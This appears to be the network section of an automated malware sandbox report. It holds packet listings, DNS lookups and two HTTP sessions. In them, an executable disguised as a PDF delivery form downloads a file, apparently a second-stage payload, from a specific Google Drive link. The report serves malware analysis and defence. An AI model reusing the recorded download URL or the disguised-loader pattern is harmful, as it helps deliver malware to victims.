                                                                Dec 19, 2024 07:58:02.328634977 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.329106092 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.329159975 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.329174995 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.330030918 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.330077887 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.330092907 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.336700916 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.336759090 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.336782932 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.336813927 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.336870909 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.337487936 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.338437080 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.338500977 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.338514090 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.351814032 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.351876020 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.351901054 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.352325916 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.352418900 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.352427006 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.353190899 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.353249073 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.353255033 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.356045008 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.356097937 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.356103897 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.356472969 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.356539011 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.356544018 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.358031988 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.358081102 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.358087063 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.382581949 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.382641077 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.382667065 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.383698940 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.383764029 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.383770943 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.384608030 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.384665012 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.384670973 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.385446072 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.385493994 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.385499954 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.386449099 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.386507988 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.386516094 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.387255907 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.387310982 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.387320995 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.391866922 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.391925097 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.391932964 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.392726898 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.392782927 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.392788887 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.393172026 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.393225908 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.393232107 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.399142027 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.399192095 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.399200916 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.400326967 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.400382996 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.400388956 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.400818110 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.400871992 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.400877953 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.409631968 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.409698963 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.409715891 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.410619020 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.410669088 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.410676003 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.417526960 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.417582035 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.417593002 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.417924881 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.417984962 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.417990923 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.418807983 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.418865919 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.418873072 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.425003052 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.425050974 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.425062895 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.425287962 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.425328970 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.425337076 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.426301956 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.426351070 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.426366091 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.440684080 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.440766096 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.440782070 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.440815926 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.440887928 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.440959930 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.441792965 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.441845894 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.441855907 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.453620911 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.453706980 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.453737020 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.454010010 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.454061985 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.454071045 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.454840899 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.454895020 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.454902887 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.469352961 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.469377995 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.469470024 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.469501019 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.469603062 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.469764948 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.470653057 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.470705986 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.470712900 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.496582985 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.496659994 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.496676922 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.496833086 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.496881008 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.496886969 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.497387886 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.497440100 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.497447014 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.505342007 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.505397081 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.505405903 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.505929947 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.505970001 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.505975008 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.506885052 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.506947041 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.506953955 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.521200895 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.521270037 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.521289110 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.521765947 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.521821022 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.521826982 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.522764921 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.522815943 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.522821903 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.528986931 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.529041052 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.529052019 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.529416084 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.529464006 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.529470921 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.530184984 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.530235052 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.530241966 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.544450045 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.544517040 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.544531107 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.544923067 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.544975996 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.544982910 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.545677900 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.545731068 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.545737982 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.548077106 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.548129082 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.548136950 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.548710108 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.548763037 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.548769951 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.549479008 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.549539089 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.549546003 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.585460901 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.585544109 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.585556030 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.585764885 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.585886002 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.585892916 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.587245941 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.587296009 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.587301970 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.587790966 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.587840080 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.587846041 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.588691950 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.588737011 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.588743925 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.590301037 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.590452909 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.590460062 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.593468904 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.593519926 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.593527079 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.593997955 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.594046116 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.594050884 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.594784975 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.594841003 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.594847918 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.596419096 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.596467018 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.596473932 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.597312927 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.597342014 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.597362041 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.597369909 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.597414970 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.598134995 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.601231098 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.601275921 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.601284027 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.601727009 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.601773977 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.601779938 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.603230953 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.603276014 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.603281975 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.609699965 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.609751940 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.609760046 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.610876083 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.610924959 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.610932112 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.611834049 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.611881018 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.611887932 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.617543936 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.617568970 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.617589951 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.617599964 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.617649078 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.618328094 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.619267941 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.619317055 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.619322062 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.632700920 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.632760048 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.632767916 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.633832932 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.633888960 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.633896112 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.634753942 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.634802103 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.634808064 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.646054029 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.646080017 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.646142960 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.646156073 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.646236897 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.646922112 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.647778034 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.647821903 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.647829056 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.664583921 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.664647102 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.664659977 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.665482998 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.665540934 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.665548086 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.687323093 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.687396049 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.687421083 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.687531948 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.687583923 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.687591076 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.688466072 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.688517094 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.688522100 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.689100027 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.689152002 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.689199924 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.689220905 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:02.689230919 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:02.689235926 CET44349712172.217.17.65192.168.2.6
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 19, 2024 07:57:53.112092972 CET5881753192.168.2.61.1.1.1
                                                                Dec 19, 2024 07:57:53.251703024 CET53588171.1.1.1192.168.2.6
                                                                Dec 19, 2024 07:57:55.968348026 CET5868653192.168.2.61.1.1.1
                                                                Dec 19, 2024 07:57:56.109941959 CET53586861.1.1.1192.168.2.6
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 19, 2024 07:57:53.112092972 CET192.168.2.61.1.1.10x6b6Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Dec 19, 2024 07:57:55.968348026 CET192.168.2.61.1.1.10xe733Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 19, 2024 07:57:53.251703024 CET1.1.1.1192.168.2.60x6b6No error (0)drive.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 07:57:56.109941959 CET1.1.1.1192.168.2.60xe733No error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.649710172.217.17.464436620C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-19 06:57:55 UTC205OUTGET /uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: drive.google.com
                                                                2024-12-19 06:57:55 UTC1319INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Thu, 19 Dec 2024 06:57:55 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fINWvHNE6Jug_rVXbPZLdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.649712172.217.17.654436620C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-19 06:57:57 UTC223OUTGET /download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: drive.usercontent.google.com
                                                                2024-12-19 06:58:01 UTC4939INHTTP/1.1 200 OK
                                                                X-GUploader-UploadID: AFiumC5oET2A_rN5GrWwFbqk0ImOpho4aLzaTIUSFIb_xeRC9RInXqqMStVSq3OrOdDmdYVEu53l2j8
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="233_Cpbxcxnxwep"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
